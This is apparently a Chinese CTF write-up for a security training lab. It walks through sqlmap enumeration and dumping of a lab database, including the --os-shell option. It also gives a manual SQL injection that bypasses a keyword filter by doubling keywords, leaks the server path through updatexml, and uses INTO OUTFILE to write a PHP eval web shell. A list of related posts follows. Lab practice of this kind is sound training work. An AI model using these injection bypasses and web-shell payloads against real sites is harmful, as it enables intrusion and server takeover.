尤里的复仇II 回归
尤里的复仇II 归来
- sqlmap尝鲜题
- sql-注入绕过防护getshell
sqlmap尝鲜题
Tips:
在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松……
很简单的啦,一跑就出来啦
传送门
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --os-shell//控制目标服务器
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --flush--session//刷新会话文件
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9 --batch//默认行为
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9* //*指定注入
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9* --dump-all//下载所有数据
ua --random-agent --risk3 --level3 -m批量操作
step1:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --batch//测试是否存在注入
step2:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -current-db --batch//查询当前数据库
step2:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" --dbs //列出所有数据库
step3:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" --tables --batch//查询当前数据库中的所有表
step4:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" --columns --batch//查询指定库中指定表的所有列(字段)
step5:
sqlmap -u "http://oovw8022.ia.aqlab.cn/caidian/?r=content&cid=9*" -D "caidian" -T "flag" -C "flag" --dump --batch//打印出指定数据
sql-注入绕过防护getshell
Tips:
这天,在朋友的介绍下,他受邀测试了某集团的网站,在签完授权合同后,他平复下激动的心情,找到漏洞所在点,祭出神器,结果……
他发现有拦截,于是开始放下工具,学习如何绕狗……
最终,他成功完成了这次任务
一个基础的绕过,感受下绕过的逻辑
传送门
进入后台http://rhiq8003.ia.aqlab.cn/bees/admin/
登入栏存在post传参,于是在登入页面输入判断回显点
' order by 6 -- g
因为有过滤所以再输入
' a and nd un union ion seselectlect 1,2,3,4,5 -- g
发现
有点回显点不能看见,换种方式
知道网站目录
' a and nd updatexml(1,concat(0x21,@@basedir),1) -- a
上传木马
1' un union ion seselectlect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile 'D:/phpStudy/WWW/bees/shell.php' -- a
<?php @eval($_POST[cmd]);?>
上传成功
用菜刀连接
找flag
flag_{axdeDaf}
尤里的复仇II 回归相关推荐
- 尤里的复仇II 回归【7题】
尤里的复仇II 回归[7题] 渗透第一步-信息收集 1 渗透第一步-信息收集 2 基础环境搭建 sqlmap尝鲜题 sql-注入绕过防护getshell awd攻防靶场-fuzz乱拳打死老师傅 归来- ...
- 封神台-尤里的复仇II 回归sql-注入绕过防护getshell
http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz 直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描 1.在用户名处加上' ...
- 尤里复仇退出界面_红色警戒2、尤里的复仇win10卡死、分辨率太大、黑屏问题多种解决方法(已测)...
Windows 10如约而至,用户在尝试新系统新感觉体验的同时,红色警戒(红色警戒2尤里的复仇,以下简称YR)--这款老游戏的命运又会如何呢?相信大家现在最关心的是:Windows 10到底能不能正常 ...
- 红警2尤里的复仇中文完整PC版
[红色警戒2尤里的复仇]还记得在<红色警戒2>中那个超人尤里吗?这次在资料片<红色警戒2尤里的复仇>中他将成为一军的领袖,与同盟军对抗,野心勃勃的尤里利用自身拥有的心灵控制能力 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...
- 封神台-第二章 尤里的复仇
封神台-第二章 尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+b ...
- 封神台-尤里的复仇Ⅰ
靶场链接:https://hack.zkaq.cn/ 文章目录 前言 四.为了更多的权限!留言板! 五.进击!拿到Web最高权限! 总结 前言 本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳 一二三四五六章
[封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 文章目录 [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 第一章:为了女神小芳 SQL注入攻击原理实战演练 第二章: ...
- 尤里复仇退出界面_win7系统下红警2尤里的复仇如何改成窗口化运行
红警2尤里的复仇是一款备受玩家喜爱的游戏之一,然而在玩游戏过程中,有时候想要游戏截图,却发现截图效果很差,就想要给红警2尤里的复仇改成窗口化运行,这样就比较好看多了,那么要怎么操作呢,本教程就给大家分 ...
最新文章
- OpenCV实现失焦模糊图像恢复
- MySQL下mysql.sock丢失问题的解决[ubuntu, linux, mysqld.sock]
- 处理网络故障常用的命令
- poj2140---herd sums
- Java之主数据类型的包装
- Eclipse配置CAS client
- JS数组与对象的遍历方法大全
- matlab的fft点数,matlab fft的点数问题
- python笔记9-多线程Threading之阻塞(join)和守护线程(setDaemon)
- 速打微补丁!这个越权文件读取漏洞影响 Windows OS
- $(document).click() 在苹果手机上不能正常运行
- 存储器和 I/O 端口有哪两种编址方式?简要说明各自特点
- ni软件可以卸载吗_电视盒子自带的软件居然可以这样卸载!
- WebGrid Enterprise
- 只要五分钟,即可将博客搬到公众号并完美布局(原创-独家)!
- codesys 串口通讯实例_CodeSys如何实现串口通信
- 003-Java技术体系
- 关于收发邮件中的一些概念解释(收件人 抄送人 密送人 回复 回复全部)
- MySQL year函数
- Android面试,给正在找工作的安卓攻城师们 ... ...
热门文章
- 5G NR 频率范围和工作频段
- toolbar工具条的用法
- win10安装CCSv8,mcsdk,seedxds560v2,软仿
- 产品经理之如何阐释需求价值
- Google Earth Engine(GEE)APP ——谷歌地球引擎因公显示森林区域植被的变化并识别可能的森林砍伐区域
- 多张图片整合成连续动画的代码
- golang值引用和指针引用,结构体拷贝
- 全国职业院校技能大赛 网络建设与运维 赛题(三)
- 怎么从windows切换到Linux,怎样直接在Windows切换到Ubuntu?反过来又怎么
- Microsoft软件保护平台服务频繁占用CPU资源